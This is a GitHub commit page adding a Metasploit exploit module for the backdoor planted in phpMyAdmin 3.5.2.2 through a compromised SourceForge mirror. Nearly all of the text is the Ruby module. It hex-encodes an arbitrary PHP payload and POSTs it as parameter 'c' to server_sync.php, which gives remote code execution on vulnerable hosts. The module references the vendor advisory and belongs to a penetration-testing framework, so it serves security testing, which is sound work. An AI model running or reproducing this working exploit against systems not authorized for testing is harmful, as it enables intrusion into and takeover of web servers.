Skip to content
This repository
Browse code

Add exploit for phpmyadmin backdoor

  • Loading branch information...
commit 3ade5a07e7bb1b1f915a6421f3f1df0895e6f16d 1 parent 93dd96d
HD Moore authored September 25, 2012
82  modules/exploits/multi/http/phpmyadmin_3522_backdoor.rb
... ...
@@ -0,0 +1,82 @@
  1
+##
  2
+# $Id$
  3
+##
  4
+
  5
+##
  6
+# This file is part of the Metasploit Framework and may be subject to
  7
+# redistribution and commercial restrictions. Please see the Metasploit
  8
+# web site for more information on licensing and terms of use.
  9
+#   http://metasploit.com/
  10
+##
  11
+
  12
+require 'msf/core'
  13
+
  14
+class Metasploit3 < Msf::Exploit::Remote
  15
+	Rank = NormalRanking
  16
+
  17
+	include Msf::Exploit::Remote::Tcp
  18
+	include Msf::Exploit::Remote::HttpClient
  19
+
  20
+	def initialize(info = {})
  21
+		super(update_info(info,
  22
+			'Name'           => 'phpMyAdmin 3.5.2.2 server_sync.php Backdoor',
  23
+			'Description'    => %q{
  24
+					This module exploits an arbitrary code execution backdoor 
  25
+				placed into phpMyAdmin v3.5.2.2 thorugh a compromised SourceForge mirror.
  26
+			},
  27
+			'Author'         => [ 'hdm' ],
  28
+			'License'        => MSF_LICENSE,
  29
+			'Version'        => '$Revision$',
  30
+			'References'     => [ ['URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2012-5.php'] ],
  31
+			'Privileged'     => false,
  32
+			'Payload'        =>
  33
+				{
  34
+					'DisableNops' => true,
  35
+					'Compat'      =>
  36
+						{
  37
+							'ConnectionType' => 'find',
  38
+						},
  39
+					# Arbitrary big number. The payload gets sent as an HTTP
  40
+					# response body, so really it's unlimited
  41
+					'Space'       => 262144, # 256k
  42
+				},
  43
+			'DefaultOptions' =>
  44
+				{
  45
+					'WfsDelay' => 30
  46
+				},
  47
+			'DisclosureDate' => 'Sep 25 2012',
  48
+			'Platform'       => 'php',
  49
+			'Arch'           => ARCH_PHP,
  50
+			'Targets'        => [[ 'Automatic', { }]],
  51
+			'DefaultTarget' => 0))
  52
+
  53
+		register_options([
  54
+			OptString.new('PATH', [ true , "The base directory containing phpMyAdmin try", '/phpMyAdmin'])
  55
+		], self.class)
  56
+	end
  57
+
  58
+	def exploit
  59
+
  60
+		uris = []
  61
+
  62
+		tpath = datastore['PATH']
  63
+		if tpath[-1,1] == '/'
  64
+			tpath = tpath.chop
  65
+		end
  66
+
  67
+		pdata = "c=" + Rex::Text.to_hex(payload.encoded, "%")
  68
+
  69
+		res = send_request_raw( {
  70
+			'global'  => true,
  71
+			'uri'     => tpath + "/server_sync.php",
  72
+			'method'  => 'POST',
  73
+			'data'    => pdata,
  74
+			'headers' => {
  75
+				'Content-Type'   => 'application/x-www-form-urlencoded',
  76
+				'Content-Length' => pdata.length,
  77
+			}
  78
+		}, 1.0)
  79
+
  80
+		handler
  81
+	end
  82
+end

0 notes on commit 3ade5a0

Please sign in to comment.
Something went wrong with that request. Please try again.